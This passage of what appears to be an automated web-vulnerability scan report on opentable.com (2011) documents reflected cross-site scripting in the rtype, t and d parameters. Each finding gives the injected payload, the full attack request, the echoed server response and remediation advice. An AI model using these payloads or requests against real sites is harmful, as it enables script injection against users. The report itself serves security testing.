Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:47 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=px=1&p1=153&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&c=1&x=10%2f03%2f2011+15%3a54%3a47; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=19&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Vary: Accept-Encoding
Content-Length: 38314


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
, 'mapimage':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=9051fe9';alert(1)//74d3d82061&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.P
...[SNIP]...

3.6. http://www.opentable.com/interim.aspx [rtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the rtype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25d31'%3balert(1)//e91e394761e was submitted in the rtype parameter. This input was echoed as 25d31';alert(1)//e91e394761e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod25d31'%3balert(1)//e91e394761e HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:55 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a55&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod%2500b8f28%2522%2ba%253db%2b16be442379f&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=153&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod25d31';alert(1)//e91e394761e&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new H
...[SNIP]...

3.7. http://www.opentable.com/interim.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c312e'%3balert(1)//0cc46fdb0ea was submitted in the t parameter. This input was echoed as c312e';alert(1)//0cc46fdb0ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=singlec312e'%3balert(1)//0cc46fdb0ea&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:49 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a49&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=29&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=6&vbefreg=6&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=29&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=29&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:49 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46196


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
'7:00 PM';
ResultProperties.Request.PartySize = 2;
ResultProperties.Request.Action = '';
ResultProperties.Request.DateTime = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Request.SearchType = 'singlec312e';alert(1)//0cc46fdb0ea';
ResultProperties.Request.SearchDate = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Response.ResultsType = 5;
ResultProperties.Response.IsWhiteLabelRestRefSearch = true;
ResultProperties.Response.
...[SNIP]...

3.8. http://www.opentable.com/opentables.aspx [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a79b6'%3balert(1)//ef617dd9c1 was submitted in the d parameter. This input was echoed as a79b6';alert(1)//ef617dd9c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PMa79b6'%3balert(1)//ef617dd9c1&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a58&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=37&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
